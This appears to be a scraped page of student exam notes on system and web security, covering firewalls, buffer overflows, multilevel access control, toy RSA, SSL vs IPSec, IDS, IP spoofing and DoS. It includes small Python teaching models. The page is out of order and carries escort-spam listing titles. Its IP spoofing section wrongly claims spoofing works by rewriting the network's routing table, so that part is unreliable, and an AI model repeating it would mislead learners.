iii. Network address translation modifies the IP (and usually port) information in packets as they pass through.
D. Application-based firewall (application layer, layer 7):
i. Application firewalls go one step further by analysing the data being transmitted.
ii. They allow network traffic to be matched against firewall rules that are specific to individual services or applications (for example HTTP methods and URLs).
iii. They are also known as proxy-based firewalls, because the firewall terminates the client's connection and opens its own connection to the server.
E. Hybrid firewalls:
i. A hybrid firewall combines features and functions from other types of firewall.
ii. It uses multiple approaches within the same device, for example stateful filtering for most traffic and application proxies for selected protocols.
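An added Python model (not from the original answer) of the difference between a packet filter and a stateful inspection firewall on the same three constructed packets: an outbound web request, its reply, and an attacker's probe of an inside host that is sent from source port 80 so that it looks like a reply. Addresses, the rule set and the `Packet` record are invented for the demonstration.

```python
from collections import namedtuple

# direction is "out" (inside host -> Internet) or "in"; syn marks a new connection.
Packet = namedtuple("Packet", "direction src sport dst dport syn")


def stateless_filter(pkt):
    """Packet filter: every packet judged on its own header. To let web replies
    back in, the rule set has to admit anything from source port 80 to a high
    port, and an attacker satisfies that just by sending from port 80."""
    if pkt.direction == "out" and pkt.dport == 80:
        return "allow"
    if pkt.direction == "in" and pkt.sport == 80 and pkt.dport >= 1024:
        return "allow"
    return "deny"


class StatefulFilter:
    """Stateful inspection: outbound connections are recorded, and an inbound
    packet is admitted only when it belongs to a connection the inside opened."""

    def __init__(self):
        self.connections = set()   # (inside_ip, inside_port, remote_ip, remote_port)

    def filter(self, pkt):
        if pkt.direction == "out" and pkt.dport == 80:
            self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "allow"
        if (pkt.direction == "in" and not pkt.syn
                and (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.connections):
            return "allow"
        return "deny"


# Constructed traffic (invented addresses): a web request, its reply, and an
# attacker probing RDP on the inside host from source port 80.
SAMPLE = [
    Packet("out", "192.168.0.10", 40000, "203.0.113.5", 80, True),
    Packet("in", "203.0.113.5", 80, "192.168.0.10", 40000, False),
    Packet("in", "198.51.100.7", 80, "192.168.0.10", 3389, True),
]


def run(filter_fn, packets):
    """Apply a filter function to each packet in order and return the decisions."""
    return [filter_fn(p) for p in packets]
```

The stateless rule set lets the probe through because its header matches the "reply" rule; the stateful filter rejects it because no inside host ever opened a connection to 198.51.100.7, and because a genuine reply never carries a bare SYN.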
No-Malicious programming errors 5M
1. Non-malicious programming errors are flaws introduced by mistake rather than by design; the best-known example is the buffer overflow.
2. A buffer overflow is the computing equivalent of trying to pour two litres of water into a one-litre pitcher.
3. It can also be likened to copying 4 GB of data onto a 2 GB drive.
4. When the buffer lives on the stack the result is a stack-based buffer overflow, also known as "smashing the stack".
5. Assume a web form that asks the user to enter data such as name, age and date of birth.
6. The information entered is sent to a server, and the server writes it into a buffer that can hold N characters.
7. If the server software does not verify that the length of the data is at most N characters, a buffer overflow occurs.
8. The overflowing data overwrites whatever lies next to the buffer in memory, which may crash the program or let an attacker take control of it.
9. The problem can be illustrated with software used for authentication.
10. If the authentication decision resides in a single flag stored after the buffer and the overflow overwrites that flag, an unauthorized user can authenticate as a legitimate user.
11. The error itself is not malicious, and often it only causes the program to malfunction or crash.
12. But it can also lose important data or, when triggered deliberately by an attacker, become a serious security vulnerability.
Multilevel access control 5M
1. Multilevel access control is also known as label-based access control.
2. Multilevel security (MLS) is the use of a computer system to process information with different (incompatible) classifications, accessed by users with different clearances.
3. Objects and users are classified with security labels.
4. The system prevents users from obtaining access to information for which they lack authorization.
5. Security labels consist of a hierarchical security level (for example Unclassified < Confidential < Secret < Top Secret) and a set of non-hierarchical security categories (compartments).
6. A multilevel security solution relies on the multilevel security feature of the operating system.
7. It prevents users from accessing information at a higher classification than their authorization ("no read up").
8. It also prevents users from declassifying information by writing it to a lower level ("no write down").
9. Using multilevel security with row-level granularity, you can define strong security for database objects and perform security checks per row.
10. Row-level security checks control which users are authorized to view, modify or perform other actions on specific rows of data.
11. A Multilevel Access Control Scheme in Transparent Computing (MACTC) has been proposed to protect user data with different security levels and to provide multilevel access control with valid identity authentication.
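An added Python example (not part of the original answer) of the label lattice and the two rules above, with row-level filtering of a small constructed table. Level names, categories and the row contents are invented; the dominance relation and the "no read up" / "no write down" checks are the standard Bell-LaPadula ones.

```python
LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}


class Label:
    """Security label: a hierarchical level plus a set of non-hierarchical categories."""

    def __init__(self, level, categories=()):
        self.level = LEVELS[level]
        self.categories = frozenset(categories)

    def dominates(self, other):
        # Lattice order: higher-or-equal level AND a superset of the categories.
        return self.level >= other.level and self.categories >= other.categories


def can_read(subject, obj):
    """Simple security property ("no read up"): the subject's clearance must dominate the object."""
    return subject.dominates(obj)


def can_write(subject, obj):
    """*-property ("no write down"): the object's label must dominate the subject,
    so a high-clearance user cannot copy data into a lower-classified object."""
    return obj.dominates(subject)


def visible_rows(subject, rows):
    """Row-level filtering: each row carries its own label; only dominated rows are returned."""
    return [data for label, data in rows if can_read(subject, label)]


# Constructed example table (invented contents): (label, row data).
ROWS = [
    (Label("UNCLASSIFIED"), "cafeteria menu"),
    (Label("CONFIDENTIAL", {"NUCLEAR"}), "reactor maintenance schedule"),
    (Label("SECRET", {"NUCLEAR"}), "fuel inventory"),
    (Label("SECRET", {"CRYPTO"}), "key schedule"),
    (Label("TOP SECRET", {"NUCLEAR", "CRYPTO"}), "launch codes"),
]
```

Note that a SECRET analyst cleared only for NUCLEAR cannot read the SECRET/CRYPTO row even though the levels are equal: categories make the order a lattice rather than a simple ranking, and dominance requires both parts.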
Explain RSA algorithm for publickey encryption. Given modulus N=143 and public key=7, find
the values of p, q, phi(n), and private key d. can we choose value of e=5? Justify.
RSA algorithm for public key encryption:
1. RSA is a public key cryptosystem that is widely used for secure data transmission.
2. It uses two keys: a public key for encryption and a private key for decryption.
3. The two keys are different (the algorithm is asymmetric), and the private key cannot be derived from the public key without factoring the modulus n.
4. The encryption key is published and is the same for every sender; the decryption key is known only to the receiver.
5. A message encrypted with the public key can be decrypted only with the matching private key.
6. Key generation: choose two distinct primes p and q; compute n = p*q and ɸ(n) = (p-1)*(q-1); choose e with 1 < e < ɸ(n) and gcd(e, ɸ(n)) = 1; compute d = e^-1 mod ɸ(n), i.e. e*d mod ɸ(n) = 1. The public key is {e, n} and the private key is {d, n}.
7. Encryption: c = m^e mod n. Decryption: m = c^d mod n.
Worked example:
Given data: n = 143, public exponent e = 7.
Step 1: factor n into two distinct primes: 143 = 11 * 13, so p = 11 and q = 13 (the order does not matter).
Step 2: n = p*q = 11 * 13 = 143.
Step 3: ɸ(n) = (p-1)*(q-1) = 10 * 12 = 120.
Step 4: check the public exponent: gcd(7, 120) = 1 and 1 < 7 < 120, so e = 7 is valid.
Step 5: find d with 7*d mod 120 = 1. Trying multiples of 120 plus 1 that are divisible by 7: 721 = 6*120 + 1 = 7 * 103, so d = 103.
Public key = {e, n} = {7, 143}
Private key = {d, n} = {103, 143}
Check with m = 2: c = 2^7 mod 143 = 128, and 128^103 mod 143 = 2.
Can we choose e = 5? No. gcd(5, 120) = 5, not 1, because 5 divides ɸ(n) = 120. Then 5*d is always a multiple of 5 and can never be congruent to 1 mod 120, so no private exponent d exists and decryption would be impossible. The value e = 5 must be rejected; e = 7 works because 7 does not divide 120.
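The worked example above as runnable Python, added here and not part of the original answer. It recovers p, q, ɸ(n) and d from the exam's toy modulus, checks the e = 5 case, and round-trips a message; the trial-division factoring is an assumption of the example that only makes sense for a modulus this small.

```python
from math import gcd


def factor_small_modulus(n):
    """Trial division: fine for an exam-sized n such as 143, hopeless for a real
    2048-bit modulus, which is exactly what RSA's security rests on."""
    for p in range(2, int(n ** 0.5) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n has no non-trivial factor")


def rsa_from_modulus(n, e):
    """Recover p, q, phi(n) and d from a toy modulus and public exponent.
    d exists only when gcd(e, phi(n)) == 1."""
    p, q = factor_small_modulus(n)
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        return {"p": p, "q": q, "phi": phi, "e": e, "d": None, "valid": False}
    d = pow(e, -1, phi)          # modular inverse: e*d = 1 (mod phi)
    return {"p": p, "q": q, "phi": phi, "e": e, "d": d, "valid": True}


def encrypt(m, e, n):
    return pow(m, e, n)          # c = m^e mod n, requires 0 <= m < n


def decrypt(c, d, n):
    return pow(c, d, n)          # m = c^d mod n
```

`pow(e, -1, phi)` raises `ValueError` when the inverse does not exist, which is the same condition the `gcd` check catches first; the e = 5 case returns `valid: False` rather than a bogus d.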
Difference between SSL and IPSec protocols 5M
No. SSL IPSec
1 SSL stands for Secure Sockets Layer (its successor is TLS). IPSec stands for Internet Protocol Security.
2 SSL operates between the application layer and the transport layer, above TCP. IPSec operates at the network (IP) layer.
3 SSL provides confidentiality, integrity and authentication (of the server, and optionally of the client). IPSec provides confidentiality (ESP), integrity and authentication (AH or ESP), and anti-replay protection.
4 SSL protects individual application sessions, typically between a browser and a web server. IPSec protects all IP traffic between two hosts or gateways, transparently to the applications.
5 Protocols of SSL: Handshake protocol, Record protocol, Alert protocol (and Change Cipher Spec). IPSec has two modes, Transport mode and Tunnel mode, and two protocols, AH and ESP.
Network Security & AttacksNetwax Lab
 
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...Network Based Intrusion Detection and Prevention Systems: Attack Classificati...
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...researchinventy
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanannewbie2019
 
Network Attacks - (Information Assurance and Security)BS in Information Techn...
Network Attacks - (Information Assurance and Security)BS in Information Techn...Network Attacks - (Information Assurance and Security)BS in Information Techn...
Network Attacks - (Information Assurance and Security)BS in Information Techn...SyvilMaeTapinit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hackingCmano Kar
 
Computer security 7.pptx
Computer security 7.pptxComputer security 7.pptx
Computer security 7.pptxKhappiyo
 
Network and web security
Network and web securityNetwork and web security
Network and web securityNitesh Saitwal
 

Similar to System and web security (20)

Network security
Network securityNetwork security
Network security
 
Lecture 5
Lecture 5Lecture 5
Lecture 5
 
Ehical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network SecurityEhical Hacking: Unit no. 1 Information and Network Security
Ehical Hacking: Unit no. 1 Information and Network Security
 
Security Operation Center Fundamental
Security Operation Center FundamentalSecurity Operation Center Fundamental
Security Operation Center Fundamental
 
Chapter 4.ppt
Chapter 4.pptChapter 4.ppt
Chapter 4.ppt
 
Top 25 SOC Analyst interview questions.pdf
Top 25 SOC Analyst interview questions.pdfTop 25 SOC Analyst interview questions.pdf
Top 25 SOC Analyst interview questions.pdf
 
Computer security system Unit1.pptx
Computer security system Unit1.pptxComputer security system Unit1.pptx
Computer security system Unit1.pptx
 
Introduction to Cyber security module - III
Introduction to Cyber security module - IIIIntroduction to Cyber security module - III
Introduction to Cyber security module - III
 
CNIT 140: Perimeter Security
CNIT 140: Perimeter SecurityCNIT 140: Perimeter Security
CNIT 140: Perimeter Security
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptx
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 
CNS unit -1.docx
CNS unit -1.docxCNS unit -1.docx
CNS unit -1.docx
 
Network Security & Attacks
Network Security & AttacksNetwork Security & Attacks
Network Security & Attacks
 
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...Network Based Intrusion Detection and Prevention Systems: Attack Classificati...
Network Based Intrusion Detection and Prevention Systems: Attack Classificati...
 
Chapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamananChapter 2 konsep dasar keamanan
Chapter 2 konsep dasar keamanan
 
Network Attacks - (Information Assurance and Security)BS in Information Techn...
Network Attacks - (Information Assurance and Security)BS in Information Techn...Network Attacks - (Information Assurance and Security)BS in Information Techn...
Network Attacks - (Information Assurance and Security)BS in Information Techn...
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
 
Computer security 7.pptx
Computer security 7.pptxComputer security 7.pptx
Computer security 7.pptx
 
Network and web security
Network and web securityNetwork and web security
Network and web security
 

More from chirag patil

Wh Yes-No questions.pptx
Wh Yes-No questions.pptxWh Yes-No questions.pptx
Wh Yes-No questions.pptxchirag patil
 
joining words not only but also.pptx
joining words not only but also.pptxjoining words not only but also.pptx
joining words not only but also.pptxchirag patil
 
Basic English Grammar 2.pptx
Basic English Grammar 2.pptxBasic English Grammar 2.pptx
Basic English Grammar 2.pptxchirag patil
 
Basic English Grammar.pptx
Basic English Grammar.pptxBasic English Grammar.pptx
Basic English Grammar.pptxchirag patil
 
Input output devices
Input output devicesInput output devices
Input output deviceschirag patil
 
Decimal and binary conversion
Decimal and binary conversionDecimal and binary conversion
Decimal and binary conversionchirag patil
 
Abbreviations and full forms
Abbreviations and full formsAbbreviations and full forms
Abbreviations and full formschirag patil
 
Web engineering and Technology
Web engineering and TechnologyWeb engineering and Technology
Web engineering and Technologychirag patil
 
Web data management
Web data managementWeb data management
Web data managementchirag patil
 
Web application development
Web application developmentWeb application development
Web application developmentchirag patil
 
Programming the web
Programming the webProgramming the web
Programming the webchirag patil
 
8051 microcontroller
8051 microcontroller8051 microcontroller
8051 microcontrollerchirag patil
 
Computer Graphics and Virtual Reality
Computer Graphics and Virtual RealityComputer Graphics and Virtual Reality
Computer Graphics and Virtual Realitychirag patil
 
Advanced Database Management Syatem
Advanced Database Management SyatemAdvanced Database Management Syatem
Advanced Database Management Syatemchirag patil
 

More from chirag patil (20)

Wh Yes-No questions.pptx
Wh Yes-No questions.pptxWh Yes-No questions.pptx
Wh Yes-No questions.pptx
 
joining words not only but also.pptx
joining words not only but also.pptxjoining words not only but also.pptx
joining words not only but also.pptx
 
Basic English Grammar 2.pptx
Basic English Grammar 2.pptxBasic English Grammar 2.pptx
Basic English Grammar 2.pptx
 
Basic English Grammar.pptx
Basic English Grammar.pptxBasic English Grammar.pptx
Basic English Grammar.pptx
 
Maths formulae
Maths formulaeMaths formulae
Maths formulae
 
Input output devices
Input output devicesInput output devices
Input output devices
 
Shortcut keys
Shortcut keysShortcut keys
Shortcut keys
 
Operating system
Operating systemOperating system
Operating system
 
Network topology
Network topologyNetwork topology
Network topology
 
Decimal and binary conversion
Decimal and binary conversionDecimal and binary conversion
Decimal and binary conversion
 
Abbreviations and full forms
Abbreviations and full formsAbbreviations and full forms
Abbreviations and full forms
 
ASCII Code
ASCII CodeASCII Code
ASCII Code
 
Web engineering and Technology
Web engineering and TechnologyWeb engineering and Technology
Web engineering and Technology
 
Web data management
Web data managementWeb data management
Web data management
 
Web application development
Web application developmentWeb application development
Web application development
 
Programming the web
Programming the webProgramming the web
Programming the web
 
Operating System
Operating SystemOperating System
Operating System
 
8051 microcontroller
8051 microcontroller8051 microcontroller
8051 microcontroller
 
Computer Graphics and Virtual Reality
Computer Graphics and Virtual RealityComputer Graphics and Virtual Reality
Computer Graphics and Virtual Reality
 
Advanced Database Management Syatem
Advanced Database Management SyatemAdvanced Database Management Syatem
Advanced Database Management Syatem
 

Recently uploaded

pipeline in computer architecture design
pipeline in computer architecture  designpipeline in computer architecture  design
pipeline in computer architecture designssuser87fa0c1
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...srsj9000
 
Arduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptArduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptSAURABHKUMAR892774
 
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxDecoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxJoão Esperancinha
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxk795866
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEroselinkalist12
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxbritheesh05
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girlsssuser7cb4ff
 
Risk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfRisk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfROCENODodongVILLACER
 
DATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage exampleDATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage examplePragyanshuParadkar1
 
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdfCCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdfAsst.prof M.Gokilavani
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...VICTOR MAESTRE RAMIREZ
 
Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024hassan khalil
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile servicerehmti665
 
Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting  .Churning of Butter, Factors affecting  .
Churning of Butter, Factors affecting .Satyam Kumar
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionDr.Costas Sachpazis
 
Heart Disease Prediction using machine learning.pptx
Heart Disease Prediction using machine learning.pptxHeart Disease Prediction using machine learning.pptx
Heart Disease Prediction using machine learning.pptxPoojaBan
 
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)dollysharma2066
 
EduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIEduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIkoyaldeepu123
 

Recently uploaded (20)

pipeline in computer architecture design
pipeline in computer architecture  designpipeline in computer architecture  design
pipeline in computer architecture design
 
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
Gfe Mayur Vihar Call Girls Service WhatsApp -> 9999965857 Available 24x7 ^ De...
 
Arduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.pptArduino_CSE ece ppt for working and principal of arduino.ppt
Arduino_CSE ece ppt for working and principal of arduino.ppt
 
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptxDecoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
Decoding Kotlin - Your guide to solving the mysterious in Kotlin.pptx
 
Introduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptxIntroduction-To-Agricultural-Surveillance-Rover.pptx
Introduction-To-Agricultural-Surveillance-Rover.pptx
 
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETEINFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
INFLUENCE OF NANOSILICA ON THE PROPERTIES OF CONCRETE
 
POWER SYSTEMS-1 Complete notes examples
POWER SYSTEMS-1 Complete notes  examplesPOWER SYSTEMS-1 Complete notes  examples
POWER SYSTEMS-1 Complete notes examples
 
Artificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptxArtificial-Intelligence-in-Electronics (K).pptx
Artificial-Intelligence-in-Electronics (K).pptx
 
Call Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call GirlsCall Girls Narol 7397865700 Independent Call Girls
Call Girls Narol 7397865700 Independent Call Girls
 
Risk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdfRisk Assessment For Installation of Drainage Pipes.pdf
Risk Assessment For Installation of Drainage Pipes.pdf
 
DATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage exampleDATA ANALYTICS PPT definition usage example
DATA ANALYTICS PPT definition usage example
 
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdfCCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
CCS355 Neural Networks & Deep Learning Unit 1 PDF notes with Question bank .pdf
 
Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...Software and Systems Engineering Standards: Verification and Validation of Sy...
Software and Systems Engineering Standards: Verification and Validation of Sy...
 
Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024Architect Hassan Khalil Portfolio for 2024
Architect Hassan Khalil Portfolio for 2024
 
Call Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile serviceCall Girls Delhi {Jodhpur} 9711199012 high profile service
Call Girls Delhi {Jodhpur} 9711199012 high profile service
 
Churning of Butter, Factors affecting .
Churning of Butter, Factors affecting  .Churning of Butter, Factors affecting  .
Churning of Butter, Factors affecting .
 
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective IntroductionSachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
Sachpazis Costas: Geotechnical Engineering: A student's Perspective Introduction
 
Heart Disease Prediction using machine learning.pptx
Heart Disease Prediction using machine learning.pptxHeart Disease Prediction using machine learning.pptx
Heart Disease Prediction using machine learning.pptx
 
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
Call Us ≽ 8377877756 ≼ Call Girls In Shastri Nagar (Delhi)
 
EduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AIEduAI - E learning Platform integrated with AI
EduAI - E learning Platform integrated with AI
 

System and web security

Difference between firewall and IDS. 5M

1. Firewall: A firewall is hardware and/or software which functions in a networked environment to block unauthorized access while permitting authorized communications.
   IDS: An Intrusion Detection System (IDS) is a software or hardware device installed on the network (NIDS) or host (HIDS) to detect and report intrusion attempts to the network.
2. Firewall: A firewall can block a connection.
   IDS: An Intrusion Detection System (IDS) cannot block a connection.
3. Firewall: A firewall performs actual actions such as blocking and filtering.
   IDS: Intrusion detection systems just detect connections and alert a system administrator.
4. Firewall: A firewall restricts access to your network by deciding which packets should be allowed.
   IDS: An intrusion detection system is like a security camera; it only detects packets.
5. Firewall: Types of firewall: Packet Filtering Firewall, Stateful-inspection Firewall, Network Address Translation (NAT) Firewall, Application Based Firewall, Hybrid firewalls.
   IDS: Types of IDS: Network IDS, Host IDS or HIDS, Protocol based IDS, Application protocol based IDS, Anomaly based IDS, Misuse Based, Hybrid based.

What is IP spoofing? How does it lead to denial of service attack? 5M

IP spoofing:
1. When a computer outside of your network pretends to be a trusted computer within the network, this action by the attacker is called IP Spoofing.
2. To gain access to your network, an outside computer must obtain one of your trusted IP addresses from the network. So the attacker might use an IP address within the range of your network.
3. On the other hand, the attacker can also use an authorized external IP address that is trusted within the network.
4. These IP addresses could be so trusted that they also have special privileges to the important resources on the network.
5. IP Spoofing and Denial of Service are the two most famous attacks that an intruder launches against a particular target.
6. While IP Spoofing targets the routing table of the network, a DoS attack aims at burning out the resources of the target computer.
7. Different ways of IP spoofing:
   a. Injection of data or a set of commands into an existing stream of data that is passed between a client and a server application.
   b. Injection of data or commands into a peer-to-peer network connection.
8. The attacker also needs to change the routing table of the network. Changing the routing table would enable the attacker to have bidirectional communication. For this purpose, the attacker points the entire routing table to the spoofed IP address.
9. Once the routing table is changed, the attacker starts receiving all the data from the network at the spoofed IP address.
10. He/she can even reply to those packets just like any other trusted user.

Denial of service attack:
1. A denial-of-service attack (DoS attack) is a cyber-attack where the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
2. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
3. A DoS attack is analogous to a group of people crowding the entry door or gate of a shop or business and not letting legitimate parties enter, disrupting normal operations.

For an online shopping system identify vulnerability, threat and attack. 5M

Vulnerability:
1. A vulnerability is a weakness that is inherent in every network and device.
2. This includes routers, switches, desktops, servers, and even security devices themselves.
3. A vulnerability is unintentional; it could exist in system design, business operations, installed software, or network configurations.
4. Vulnerabilities can be hardware, software or network vulnerabilities.
5. A vulnerability is an internal problem.
6. Types of vulnerability:
   i. Software vulnerabilities: Software vulnerabilities are errors or bugs in applications. Attackers look at buggy software as an opportunity to attack the system by making use of these flaws. Example: Buffer overflow, race conditions etc.
   ii. Firewall vulnerabilities: Firewalls are software and hardware systems that protect an intra-network from attacks. A firewall vulnerability is an error, weakness or invalid assumption made during the firewall design, implementation or configuration that can be exploited to attack the trusted network that the firewall is supposed to protect.
   iii. TCP/IP vulnerabilities: These vulnerabilities are in the protocols of the various layers of a network. These protocols may lack features that are desirable on an insecure network. Example: ARP attacks, fragmentation attacks etc.
   iv. Wireless network vulnerabilities: Wireless LANs suffer protocol-based attacks similar to those that plague wired LANs. Unsecured wireless access points can be a danger to organizations as they offer the attacker a route around the company's network. Example: SSID issues, WEP issues etc.
   v. Operating system vulnerabilities: The security of the applications running on an operating system depends on the security of the operating system. The slightest negligence by the system administrator can make the operating system vulnerable.
   vi. Web server vulnerabilities: These vulnerabilities are caused by design and engineering errors or faulty implementation. Example: sniffing, spoofing etc.

Threat:
1. In computer security a threat is a potential cause of an incident that may result in harm to systems and the organization.
2. A threat can be either "intentional" (i.e. hacking: an individual cracker or a criminal organization) or "accidental" (e.g. the possibility of a computer malfunctioning) or otherwise a circumstance, capability, action, or event.
3. Threats classification: Threats can be classified according to their type and origin.
4. Types of threats:
   i. Interception: When an attacker gains unauthorized access to confidential information, it is known as interception. Example: Snooping, traffic analysis
   ii. Interruption: When important information of the system is lost or unavailable to a user for some reason, it is known as interruption. Example: Denial of Service (DoS)
   iii. Modification: If an attacker gets access to a user's information and can also tamper with it, then such a threat is known as modification.
   iv. Fabrication: An attacker can create or fabricate counterfeit objects on a computing system. The attacker may insert extra transactions into a network communication system or add records to an existing database. Example: Man-in-the-middle attack, replay attack etc.
5. Origins of threats:
   i. Deliberate: aiming at an information asset; spying, illegal processing of data
   ii. Accidental: equipment failure, software failure
   iii. Environmental: natural event, loss of power supply
   iv. Negligence: known but neglected factors, compromising the network's safety and sustainability

Attack:
1. In computers and computer networks an attack is any attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset.
2. Types of attack: Active attack and Passive attack
3. An "active attack" attempts to alter system resources or affect their operation.
4. A "passive attack" attempts to learn or make use of information from the system but does not affect system resources.
5. An "inside attack" is an attack initiated by an entity inside the security perimeter (an "insider").
6. An "outside attack" is initiated from outside the perimeter, by an unauthorized or illegitimate user of the system (an "outsider").

Explain Needham Schroeder Authentication Protocol. 10M

1. The term Needham–Schroeder protocol can refer to one of two key transport protocols intended for use over an insecure network, both proposed by Roger Needham and Michael Schroeder.
2. The Needham–Schroeder Symmetric Key Protocol is based on a symmetric encryption algorithm.
3. It forms the basis for the Kerberos protocol.
